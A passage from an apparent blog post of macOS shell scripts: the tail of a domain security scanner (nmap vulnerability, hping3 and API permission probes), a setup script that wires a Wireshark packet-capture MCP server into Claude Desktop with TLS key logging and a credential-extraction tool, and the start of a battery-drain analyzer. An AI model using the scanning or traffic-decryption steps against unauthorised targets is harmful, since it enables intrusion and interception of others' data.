### 8.3 CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS headers found")
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 9. HTTP Security Headers

\`\`\`
$(cat http_headers.txt)
\`\`\`

**Security Headers Status:**
\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## 10. Recommendations

### 10.1 Immediate Actions

EOF

    # Add recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. Disable TLSv1.0 and TLSv1.1 protocols" >> "$TECH_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. Patch identified vulnerabilities" >> "$TECH_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. Update outdated software components" >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

### 10.2 Review Actions

1. Review all open ports and services
2. Audit subdomain inventory
3. Implement missing security headers
4. Review API authentication
5. Schedule regular security assessments

---

## 11. Document Control

**Classification:** CONFIDENTIAL  
**Distribution:** Security Team, Infrastructure Team  
**Prepared By:** Enhanced Security Scanner v$VERSION  
**Date:** $(date)

---

**END OF TECHNICAL REPORT**
EOF

    log_success "Technical report generated: $TECH_REPORT"
    log_debug "Technical report saved to: $SCAN_DIR/$TECH_REPORT"
}

################################################################################
# Generate Vulnerability Report
################################################################################
generate_vulnerability_report() {
    if [ "$VULN_SCAN" = false ]; then
        log_debug "Vulnerability scanning disabled, skipping vulnerability report"
        return
    fi
    
    log_info "Generating vulnerability report..."
    log_debug "Creating vulnerability report"
    
    cat > "$VULN_REPORT" << EOF
# Vulnerability Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION

---

## Executive Summary

**Total Vulnerabilities Found:** $(cat vulnerability_count.txt)

---

## 1. NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

---

## 2. HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

---

## 3. SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

---

## 4. Detailed Findings

\`\`\`
$(cat vulnerabilities_found.txt)
\`\`\`

---

**END OF VULNERABILITY REPORT**
EOF

    log_success "Vulnerability report generated: $VULN_REPORT"
    log_debug "Vulnerability report saved to: $SCAN_DIR/$VULN_REPORT"
}

################################################################################
# Generate API Security Report
################################################################################
generate_api_report() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping API report"
        return
    fi
    
    log_info "Generating API security report..."
    log_debug "Creating API security report"
    
    cat > "$API_REPORT" << EOF
# API Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Scanner Version:** $VERSION

---

## 1. API Discovery

### 1.1 Endpoints Found

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

---

## 2. Permission Testing

### 2.1 Unauthenticated Access

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No unauthenticated access issues")
\`\`\`

### 2.2 HTTP Method Issues

\`\`\`
$(cat api_permissions/method_issues.txt 2>/dev/null || echo "No method issues found")
\`\`\`

---

## 3. CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS headers returned")
\`\`\`

---

**END OF API SECURITY REPORT**
EOF

    log_success "API security report generated: $API_REPORT"
    log_debug "API security report saved to: $SCAN_DIR/$API_REPORT"
}

################################################################################
# Main Execution
################################################################################
main() {
    echo "========================================"
    echo "Enhanced Security Scanner v${VERSION}"
    echo "========================================"
    echo
    log_debug "Script started at $(date)"
    log_debug "Network interface: $NETWORK_INTERFACE"
    log_debug "Debug mode: $DEBUG"
    echo
    
    # Check dependencies
    check_dependencies
    
    # Initialize scan
    initialize_scan
    
    # Run scans
    log_debug "Starting DNS reconnaissance phase"
    dns_reconnaissance
    
    log_debug "Starting subdomain discovery phase"
    discover_subdomains
    
    log_debug "Starting SSL/TLS analysis phase"
    ssl_tls_analysis
    
    log_debug "Starting port scanning phase"
    port_scanning
    
    if [ "$VULN_SCAN" = true ]; then
        log_debug "Starting vulnerability scanning phase"
        vulnerability_scanning
    fi
    
    log_debug "Starting hping3 testing phase"
    hping3_testing
    
    log_debug "Starting asset discovery phase"
    asset_discovery
    
    log_debug "Starting old software detection phase"
    detect_old_software
    
    if [ "$API_SCAN" = true ]; then
        log_debug "Starting API discovery phase"
        api_discovery
        log_debug "Starting API permission testing phase"
        api_permission_testing
    fi
    
    log_debug "Starting HTTP security headers analysis phase"
    http_security_headers
    
    log_debug "Starting subdomain scanning phase"
    scan_subdomains
    
    # Generate reports
    log_debug "Starting report generation phase"
    generate_executive_summary
    generate_technical_report
    generate_vulnerability_report
    generate_api_report
    
    # Summary
    echo
    echo "========================================"
    log_success "Scan Complete!"
    echo "========================================"
    echo
    log_info "Scan directory: $SCAN_DIR"
    log_info "Executive summary: $SCAN_DIR/$EXEC_REPORT"
    log_info "Technical report: $SCAN_DIR/$TECH_REPORT"
    
    if [ "$VULN_SCAN" = true ]; then
        log_info "Vulnerability report: $SCAN_DIR/$VULN_REPORT"
    fi
    
    if [ "$API_SCAN" = true ]; then
        log_info "API security report: $SCAN_DIR/$API_REPORT"
    fi
    
    echo
    log_info "Review the reports for detailed findings"
    log_debug "Script completed at $(date)"
}

################################################################################
# Parse Command Line Arguments
################################################################################
DOMAIN=""
SCAN_SUBDOMAINS=false
MAX_SUBDOMAINS=10
VULN_SCAN=false
API_SCAN=false

while getopts "d:sm:vah" opt; do
    case $opt in
        d)
            DOMAIN="$OPTARG"
            ;;
        s)
            SCAN_SUBDOMAINS=true
            ;;
        m)
            MAX_SUBDOMAINS="$OPTARG"
            ;;
        v)
            VULN_SCAN=true
            ;;
        a)
            API_SCAN=true
            ;;
        h)
            usage
            ;;
        \?)
            log_error "Invalid option: -$OPTARG"
            usage
            ;;
    esac
done

# Validate required arguments
if [ -z "$DOMAIN" ]; then
    log_error "Domain is required"
    usage
fi

# Run main function
main
            echo "${HEADERS[$header]}: Present" >>

EOF

chmod +x ./security_scanner_enhanced.sh
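Before running the full scanner, it can help to see how its flag parsing behaves. The sketch below replays the scanner's `getopts` block (minus the `-h`/usage handling) against a simulated command line; `example.com` is just a placeholder target:

```shell
#!/bin/sh
# Stand-alone replay of the scanner's flag parsing.
# Simulate: ./security_scanner_enhanced.sh -d example.com -s -m 5 -v
set -- -d example.com -s -m 5 -v

DOMAIN=""; SCAN_SUBDOMAINS=false; MAX_SUBDOMAINS=10; VULN_SCAN=false; API_SCAN=false
while getopts "d:sm:va" opt; do
    case $opt in
        d) DOMAIN="$OPTARG" ;;          # target domain (required)
        s) SCAN_SUBDOMAINS=true ;;      # also scan discovered subdomains
        m) MAX_SUBDOMAINS="$OPTARG" ;;  # cap on subdomains to scan
        v) VULN_SCAN=true ;;            # enable vulnerability scanning
        a) API_SCAN=true ;;             # enable API scanning
    esac
done

echo "domain=$DOMAIN subdomains=$SCAN_SUBDOMAINS max=$MAX_SUBDOMAINS vuln=$VULN_SCAN api=$API_SCAN"
```

Note that `-v` and `-a` are opt-in: without them, the vulnerability and API report functions return early.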

MacBook: Set up a Wireshark packet capture MCP for Anthropic Claude Desktop

If you’re like me, the idea of doing anything twice makes you break out in a cold shiver. In Claude Desktop, I often need a network pcap (packet capture) to unpack something I’m working on. The script below checks for Wireshark and WireMCP (the Wireshark MCP server), then configures Claude Desktop to use it. I also got it working with Zscaler (note: I just did a process grep; you could also check for the utun tunnel interface or local ports 9000/9400).

I also added example scripts to test that it’s working, and some prompts to help you test it in Claude.
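On the port-based alternative: Zscaler Client Connector typically runs a local proxy on ports 9000/9400, so instead of `pgrep` you could look for those listeners in `netstat -an`. A minimal sketch of that check, run here against a hard-coded sample so the logic is reproducible (swap the sample for real `netstat -an` output on your machine):

```shell
#!/bin/sh
# Sample netstat -an lines; on a real machine use: netstat -an
sample='tcp4  0  0  127.0.0.1.9000   *.*   LISTEN
tcp4  0  0  127.0.0.1.631    *.*   LISTEN'

# A listener on .9000 or .9400 suggests the Zscaler local proxy
if printf '%s\n' "$sample" | grep -qE '\.(9000|9400)[[:space:]].*LISTEN'; then
    ZSCALER_LIKELY=true
else
    ZSCALER_LIKELY=false
fi
echo "zscaler_likely=$ZSCALER_LIKELY"
```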

cat > ~/setup_wiremcp_simple.sh << 'EOF'
#!/bin/bash

# Simplified WireMCP Setup with Zscaler Support

echo ""
echo "============================================"
echo "   WireMCP Setup with Zscaler Support"
echo "============================================"
echo ""

# Detect Zscaler
echo "[INFO] Detecting Zscaler..."
ZSCALER_DETECTED=false
ZSCALER_INTERFACE=""

# Check for Zscaler process
if pgrep -f "Zscaler" >/dev/null 2>&1; then
    ZSCALER_DETECTED=true
    echo "[ZSCALER] ✓ Zscaler process is running"
fi

# Find Zscaler tunnel interface
UTUN_INTERFACES=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_INTERFACES; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        ZSCALER_INTERFACE="$iface"
        ZSCALER_DETECTED=true
        echo "[ZSCALER] ✓ Zscaler tunnel found: $iface (IP: $IP)"
        break
    fi
done

if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "[ZSCALER] ✓ Zscaler environment confirmed"
else
    echo "[INFO] No Zscaler detected - standard network"
fi

echo ""

# Check existing installations
echo "[INFO] Checking installed software..."

if command -v tshark >/dev/null 2>&1; then
    echo "[✓] Wireshark/tshark is installed"
else
    echo "[!] Wireshark not found - install with: brew install --cask wireshark"
fi

if command -v node >/dev/null 2>&1; then
    echo "[✓] Node.js is installed: $(node --version)"
else
    echo "[!] Node.js not found - install with: brew install node"
fi

if [[ -d "$HOME/WireMCP" ]]; then
    echo "[✓] WireMCP is installed at ~/WireMCP"
else
    echo "[!] WireMCP not found"
fi

echo ""

# Configure SSL decryption for Zscaler
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "[INFO] Configuring SSL/TLS decryption..."
    
    SSL_KEYLOG="$HOME/.wireshark-sslkeys.log"
    touch "$SSL_KEYLOG"
    chmod 600 "$SSL_KEYLOG"
    
    if ! grep -q "SSLKEYLOGFILE" ~/.zshrc 2>/dev/null; then
        echo "" >> ~/.zshrc
        echo "# Wireshark SSL/TLS decryption for Zscaler" >> ~/.zshrc
        echo "export SSLKEYLOGFILE=\"$SSL_KEYLOG\"" >> ~/.zshrc
        echo "[✓] Added SSLKEYLOGFILE to ~/.zshrc"
    else
        echo "[✓] SSLKEYLOGFILE already in ~/.zshrc"
    fi
    
    echo "[✓] SSL key log file: $SSL_KEYLOG"
fi

echo ""

# Update WireMCP for Zscaler
if [[ -d "$HOME/WireMCP" ]]; then
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        echo "[INFO] Creating Zscaler-aware wrapper..."
        
        cat > "$HOME/WireMCP/start_zscaler.sh" << 'WRAPPER'
#!/bin/bash
echo "=== WireMCP (Zscaler Mode) ==="

# Set SSL decryption
export SSLKEYLOGFILE="$HOME/.wireshark-sslkeys.log"

# Find Zscaler interface
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        export CAPTURE_INTERFACE="$iface"
        echo "✓ Zscaler tunnel: $iface ($IP)"
        echo "✓ All proxied traffic flows through this interface"
        break
    fi
done

if [[ -z "$CAPTURE_INTERFACE" ]]; then
    export CAPTURE_INTERFACE="en0"
    echo "! Using default interface: en0"
fi

echo ""
echo "Configuration:"
echo "  SSL Key Log: $SSLKEYLOGFILE"
echo "  Capture Interface: $CAPTURE_INTERFACE"
echo ""
echo "To capture: sudo tshark -i $CAPTURE_INTERFACE -c 10"
echo "===============================\n"

cd "$(dirname "$0")"
node index.js
WRAPPER
        
        chmod +x "$HOME/WireMCP/start_zscaler.sh"
        echo "[✓] Created ~/WireMCP/start_zscaler.sh"
    fi
    
    # Create test script
    cat > "$HOME/WireMCP/test_zscaler.sh" << 'TEST'
#!/bin/bash

echo "=== Zscaler & WireMCP Test ==="
echo ""

# Check Zscaler process
if pgrep -f "Zscaler" >/dev/null; then
    echo "✓ Zscaler is running"
else
    echo "✗ Zscaler not running"
fi

# Find tunnel
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        echo "✓ Zscaler tunnel: $iface ($IP)"
        FOUND=true
        break
    fi
done

[[ "$FOUND" != "true" ]] && echo "✗ No Zscaler tunnel found"

echo ""

# Check SSL keylog
if [[ -f "$HOME/.wireshark-sslkeys.log" ]]; then
    SIZE=$(wc -c < "$HOME/.wireshark-sslkeys.log")
    echo "✓ SSL key log exists ($SIZE bytes)"
else
    echo "✗ SSL key log not found"
fi

echo ""
echo "Network interfaces:"
tshark -D 2>/dev/null | head -5

echo ""
echo "To capture Zscaler traffic:"
echo "  sudo tshark -i ${iface:-en0} -c 10"
TEST
    
    chmod +x "$HOME/WireMCP/test_zscaler.sh"
    echo "[✓] Created ~/WireMCP/test_zscaler.sh"
fi

echo ""

# Configure Claude Desktop
CLAUDE_CONFIG="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
if [[ -d "$(dirname "$CLAUDE_CONFIG")" ]]; then
    echo "[INFO] Configuring Claude Desktop..."
    
    # Backup existing
    if [[ -f "$CLAUDE_CONFIG" ]]; then
        BACKUP_FILE="${CLAUDE_CONFIG}.backup.$(date +%Y%m%d_%H%M%S)"
        cp "$CLAUDE_CONFIG" "$BACKUP_FILE"
        echo "[✓] Backup created: $BACKUP_FILE"
    fi
    
    # Check if jq is installed
    if ! command -v jq >/dev/null 2>&1; then
        echo "[INFO] Installing jq for JSON manipulation..."
        brew install jq
    fi
    
    # Create temp capture directory
    TEMP_CAPTURE_DIR="$HOME/.wiremcp/captures"
    mkdir -p "$TEMP_CAPTURE_DIR"
    echo "[✓] Capture directory: $TEMP_CAPTURE_DIR"
    
    # Prepare environment variables
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        ENV_JSON=$(jq -n \
            --arg ssllog "$HOME/.wireshark-sslkeys.log" \
            --arg iface "${ZSCALER_INTERFACE:-en0}" \
            --arg capdir "$TEMP_CAPTURE_DIR" \
            '{"SSLKEYLOGFILE": $ssllog, "CAPTURE_INTERFACE": $iface, "ZSCALER_MODE": "true", "CAPTURE_DIR": $capdir}')
    else
        ENV_JSON=$(jq -n \
            --arg capdir "$TEMP_CAPTURE_DIR" \
            '{"CAPTURE_DIR": $capdir}')
    fi
    
    # Add or update wiremcp in config, preserving existing servers
    if [[ -f "$CLAUDE_CONFIG" ]] && [[ -s "$CLAUDE_CONFIG" ]]; then
        echo "[INFO] Merging WireMCP into existing config..."
        jq --arg home "$HOME" \
           --argjson env "$ENV_JSON" \
           '.mcpServers.wiremcp = {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}' \
           "$CLAUDE_CONFIG" > "${CLAUDE_CONFIG}.tmp" && mv "${CLAUDE_CONFIG}.tmp" "$CLAUDE_CONFIG"
    else
        echo "[INFO] Creating new Claude config..."
        jq -n --arg home "$HOME" \
              --argjson env "$ENV_JSON" \
              '{"mcpServers": {"wiremcp": {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}}}' \
              > "$CLAUDE_CONFIG"
    fi
    
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        echo "[✓] Claude configured with Zscaler mode"
    else
        echo "[✓] Claude configured"
    fi
    echo "[✓] Existing MCP servers preserved"
fi

echo ""
echo "============================================"
echo "             Summary"
echo "============================================"
echo ""

if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "Zscaler Environment:"
    echo "  ✓ Detected and configured"
    [[ -n "$ZSCALER_INTERFACE" ]] && echo "  ✓ Tunnel interface: $ZSCALER_INTERFACE"
    echo "  ✓ SSL decryption ready"
    echo ""
    echo "Next steps:"
    echo "  1. Restart terminal: source ~/.zshrc"
    echo "  2. Restart browsers for HTTPS decryption"
else
    echo "Standard Network:"
    echo "  • No Zscaler detected"
    echo "  • Standard configuration applied"
fi

echo ""
echo "For Claude Desktop:"
echo "  1. Restart Claude Desktop app"
echo "  2. Ask Claude to analyze network traffic"
echo ""
echo "============================================"

exit 0
EOF
chmod +x ~/setup_wiremcp_simple.sh
~/setup_wiremcp_simple.sh

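Once the setup script has run, the Claude config should contain a `wiremcp` entry alongside any MCP servers you already had. The check below is shown against an inline sample of the expected JSON shape (the `/Users/me` path is a placeholder); on your machine, point `grep` or `jq` at the real config file:

```shell
#!/bin/sh
# Inline sample of the shape the setup script writes; the path is a placeholder
sample='{"mcpServers":{"wiremcp":{"command":"node","args":["/Users/me/WireMCP/index.js"]}}}'

STATUS="missing"
if printf '%s' "$sample" | grep -q '"wiremcp"'; then
    STATUS="wiremcp entry present"
fi
echo "$STATUS"

# Real checks on your machine:
#   grep '"wiremcp"' "$HOME/Library/Application Support/Claude/claude_desktop_config.json"
#   jq '.mcpServers | keys' "$HOME/Library/Application Support/Claude/claude_desktop_config.json"
```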
To test if the script worked:

cat > ~/test_wiremcp_claude.sh << 'EOF'
#!/bin/bash

# WireMCP Claude Desktop Interactive Test Script

echo "╔════════════════════════════════════════════════════════╗"
echo "║     WireMCP + Claude Desktop Testing Tool             ║"
echo "╚════════════════════════════════════════════════════════╝"
echo ""

# Colors
GREEN='\033[0;32m'
BLUE='\033[0;34m'
YELLOW='\033[1;33m'
NC='\033[0m'

# Check prerequisites
echo -e "${BLUE}[1/4]${NC} Checking prerequisites..."

if ! command -v tshark >/dev/null 2>&1; then
    echo "   ✗ tshark not found"
    exit 1
fi

if [[ ! -d "$HOME/WireMCP" ]]; then
    echo "   ✗ WireMCP not found at ~/WireMCP"
    exit 1
fi

if [[ ! -f "$HOME/Library/Application Support/Claude/claude_desktop_config.json" ]]; then
    echo "   ⚠ Claude Desktop config not found"
fi

echo -e "   ${GREEN}✓${NC} All prerequisites met"
echo ""

# Detect Zscaler
echo -e "${BLUE}[2/4]${NC} Detecting network configuration..."

ZSCALER_IF=""
for iface in $(ifconfig -l | grep -o 'utun[0-9]*'); do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        ZSCALER_IF="$iface"
        echo -e "   ${GREEN}✓${NC} Zscaler tunnel: $iface ($IP)"
        break
    fi
done

if [[ -z "$ZSCALER_IF" ]]; then
    echo "   ⚠ No Zscaler tunnel detected (will use en0)"
    ZSCALER_IF="en0"
fi

echo ""

# Generate test traffic
echo -e "${BLUE}[3/4]${NC} Generating test network traffic..."

# Background network requests
(curl -s https://api.github.com/zen > /dev/null 2>&1) &
(curl -s https://httpbin.org/get > /dev/null 2>&1) &
(curl -s https://www.google.com > /dev/null 2>&1) &
(ping -c 3 8.8.8.8 > /dev/null 2>&1) &

sleep 2
echo -e "   ${GREEN}✓${NC} Test traffic generated (GitHub, httpbin, Google, DNS)"
echo ""

# Show test prompts
echo -e "${BLUE}[4/4]${NC} Test prompts for Claude Desktop"
echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${YELLOW}📋 Copy these prompts into Claude Desktop:${NC}"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 1: Basic Connection Test"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Can you see the WireMCP tools? List all available network analysis capabilities you have access to.
EOF
echo ""
echo "Expected: Claude should list 7 tools (capture_packets, get_summary_stats, etc.)"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 2: Simple Packet Capture"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 20 network packets and show me a summary including:
- Source and destination IPs
- Protocols used
- Port numbers
- Any interesting patterns
EOF
echo ""
echo "Expected: Packets from $ZSCALER_IF with IPs in 100.64.x.x range"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 3: Protocol Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 50 packets and show me:
1. Protocol breakdown (TCP, UDP, DNS, HTTP, TLS)
2. Which protocol is most common
3. Protocol hierarchy statistics
EOF
echo ""
echo "Expected: Protocol percentages and hierarchy tree"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 4: Connection Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 100 packets and show me network conversations:
- Top 5 source/destination pairs
- Number of packets per conversation
- Bytes transferred
EOF
echo ""
echo "Expected: Conversation statistics with packet/byte counts"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 5: Threat Detection"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture traffic for 30 seconds and check all destination IPs against threat databases. Tell me if any malicious IPs are detected.
EOF
echo ""
echo "Expected: List of IPs and threat check results (should show 'No threats')"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 6: HTTPS Decryption (Advanced)"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "⚠️  First: Restart your browser after running this:"
echo "    source ~/.zshrc && echo \$SSLKEYLOGFILE"
echo ""
cat << 'EOF'
Capture 30 packets while I browse some HTTPS websites. Can you see any HTTP hostnames or request URIs from the HTTPS traffic?
EOF
echo ""
echo "Expected: If SSL keys are logged, Claude sees decrypted HTTP data"
echo ""

echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${YELLOW}🔧 Manual Verification Commands:${NC}"
echo ""
echo "  # Test manual capture:"
echo "  sudo tshark -i $ZSCALER_IF -c 10"
echo ""
echo "  # Check SSL keylog:"
echo "  ls -lh ~/.wireshark-sslkeys.log"
echo ""
echo "  # Test WireMCP server:"
echo "  cd ~/WireMCP && timeout 3 node index.js"
echo ""
echo "  # Check Claude config:"
echo "  cat \"\$HOME/Library/Application Support/Claude/claude_desktop_config.json\""
echo ""

echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${GREEN}✅ Test setup complete!${NC}"
echo ""
echo "Next steps:"
echo "  1. Open Claude Desktop"
echo "  2. Copy/paste the test prompts above"
echo "  3. Verify Claude can access WireMCP tools"
echo "  4. Check ~/WIREMCP_TESTING_EXAMPLES.md for more examples"
echo ""

# Keep generating traffic in background
echo "Keeping test traffic active for 2 minutes..."
echo "(You can Ctrl+C to stop)"
echo ""

# Generate continuous light traffic
for i in {1..24}; do
    (curl -s https://httpbin.org/delay/1 > /dev/null 2>&1) &
    sleep 5
done

echo ""
echo "Traffic generation complete!"
echo ""

EOF

chmod +x ~/test_wiremcp_claude.sh

Now that you’ve confirmed everything is working, the sections below give you a few example tests to carry out.

# Try WireMCP Right Now! 🚀

## 🎯 3-Minute Quick Start

### Step 1: Restart Claude Desktop (30 seconds)
```bash
# Kill and restart Claude
killall Claude
sleep 2
open -a Claude
```

### Step 2: Create a Script to Generate Some Traffic (30 seconds)

cat > ~/network_activity_loop.sh << 'EOF'
#!/bin/bash

# Script to generate network activity for 30 seconds
# Useful for testing network capture tools

echo "Starting network activity generation for 30 seconds..."
echo "Press Ctrl+C to stop early if needed"

# Record start time
start_time=$(date +%s)
end_time=$((start_time + 30))

# Counter for requests
request_count=0

# Loop for 30 seconds
while [ $(date +%s) -lt $end_time ]; do
    # Create network activity to capture
    echo -n "Request set #$((++request_count)) at $(date +%T): "
    
    # GitHub API call
    curl -s https://api.github.com/users/octocat > /dev/null 2>&1 &
    
    # HTTPBin JSON endpoint
    curl -s https://httpbin.org/json > /dev/null 2>&1 &
    
    # IP address check
    curl -s https://ifconfig.me > /dev/null 2>&1 &
    
    # Wait for background jobs to complete
    wait
    echo "completed"
    
    # Small delay to avoid overwhelming the servers
    sleep 0.5
done

echo ""
echo "Network activity generation completed!"
echo "Total request sets sent: $request_count"
echo "Duration: 30 seconds"
EOF

chmod +x ~/network_activity_loop.sh

# Call the script
~/network_activity_loop.sh

Time to play!

Now open Claude Desktop and we can run a few tests…

1. Ask Claude:

Can you see the WireMCP tools? List all available network analysis capabilities.

Claude should list 7 tools:

- capture_packets
- get_summary_stats
- get_conversations
- check_threats
- check_ip_threats
- analyze_pcap
- extract_credentials

2. Ask Claude:

Capture 20 network packets and tell me:
- What IPs am I talking to?
- What protocols are being used?
- Anything interesting?

3. In a terminal, run:

```bash
curl -v https://api.github.com/users/octocat
```

Ask Claude:

I just called api.github.com. Can you capture my network traffic
for 10 seconds and tell me:
1. What IP did GitHub resolve to?
2. How long did the connection take?
3. Were there any errors?

4. Ask Claude:

Monitor my network for 30 seconds and show me:
- Top 5 destinations by packet count
- What services/companies am I connecting to?
- Any unexpected connections?

5. Developer Debugging Examples – Debug Slow API. Ask Claude:

I’m calling myapi.company.com and it feels slow.
Capture traffic for 30 seconds while I make a request and tell me:
- Where is the latency coming from?
- DNS, TCP handshake, TLS, or server response?
- Any retransmissions?

6. Developer Debugging Examples – Debug Connection Timeout. Ask Claude:

I’m getting timeouts to db.example.com:5432.
Capture for 30 seconds and tell me:
1. Is DNS resolving?
2. Are SYN packets being sent?
3. Do I get SYN-ACK back?
4. Any firewall blocking?

7. TLS Handshake failures (often happen with zero trust networks and cert pinning). Ask Claude:

Monitor my network for 2 minutes and look for abnormal TLS handshakes, in particular short-lived TLS handshakes, which can occur due to cert-pinning issues.

8. Check for Threats. Ask Claude:

Monitor my network for 60 seconds and check all destination
IPs against threat databases. Tell me if anything suspicious.

9. Monitor Background Apps. Ask Claude:

Capture traffic for 30 seconds while I’m idle.
What apps are calling home without me knowing? Only get conversation statistics to show the key connections and the amount of traffic through each. Show any failed traffic or unusual traffic patterns

10. VPN Testing. Ask Claude:

Capture packets for 60 seconds, during which time I will enable my VPN. Compare before and after, and see if you can pinpoint exactly when my VPN was enabled.

11. Audit traffic. Ask Claude:

Monitor for 5 minutes and tell me:
- Which service used most bandwidth?
- Any large file transfers?
- Unexpected data usage?

12. Looking for specific protocols. Ask Claude:

Monitor my traffic for 30 seconds and see if you can spot any traffic using QUIC and give me statistics on it.

(then go open YouTube in your browser)

13. DNS Queries. Ask Claude:

As a network troubleshooter, analyze all DNS queries for 30 seconds and provide potential causes for any errors. Show me detailed metrics on any calls, especially failed calls or unusual DNS patterns (like NXDOMAIN, PTR or TXT calls)

14. Certificate Issues. Ask Claude:

Capture TLS handshakes for the next minute and show me the certificate chain. Look out for failed or short-lived TLS sessions.

## What Makes This Powerful?

The traditional way:

```bash
sudo tcpdump -i utun5 -w capture.pcap
# Wait…
# Stop capture
# Open Wireshark
# Apply filters
# Analyze packets manually
# Figure out what it means
```

Time: 10-30 minutes!

With WireMCP + Claude:

“Capture my network traffic and tell me what’s happening in plain English”

Time: 30 seconds

Claude automatically:
- Captures on the correct interface (utun5)
- Filters relevant packets
- Analyzes protocols
- Identifies issues
- Explains it all in plain English
- Provides recommendations

MacBook: A script to figure out which processes are causing battery usage/drain issues (even when the laptop lid is closed)

If you’re trying to figure out what’s draining your MacBook, even when the lid is closed, try the script below (run it with `sudo ~/battery_drain_analyzer.sh`):

cat > ~/battery_drain_analyzer.sh << 'EOF'
#!/bin/bash

# Battery Drain Analyzer for macOS
# This script analyzes processes and settings that affect battery life,
# especially when the laptop lid is closed.

# Colors for terminal output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Output file
REPORT_FILE="battery_drain_report_$(date +%Y%m%d_%H%M%S).md"
TEMP_DIR=$(mktemp -d)

echo -e "${GREEN}Battery Drain Analyzer${NC}"
echo "Collecting system information..."
echo "This may take a minute and will require administrator privileges for some checks."
echo ""

# Function to check if running with sudo
check_sudo() {
    if [[ $EUID -ne 0 ]]; then
        echo -e "${YELLOW}Some metrics require sudo access. Re-running with sudo...${NC}"
        sudo "$0" "$@"
        exit $?
    fi
}

# Invoke it so the privileged checks (e.g. powermetrics) can run
check_sudo "$@"

# Start the report
cat > "$REPORT_FILE" << EOF
# Battery Drain Analysis Report
**Generated:** $(date '+%Y-%m-%d %H:%M:%S %Z')  
**System:** $(sysctl -n hw.model)  
**macOS Version:** $(sw_vers -productVersion)  
**Uptime:** $(uptime | sed 's/.*up //' | sed 's/,.*//')

---

## Executive Summary
This report analyzes processes and settings that consume battery power, particularly when the laptop lid is closed.

EOF

# 1. Check current power assertions
echo "Checking power assertions..."
cat >> "$REPORT_FILE" << EOF

## 🔋 Current Power State

### Active Power Assertions
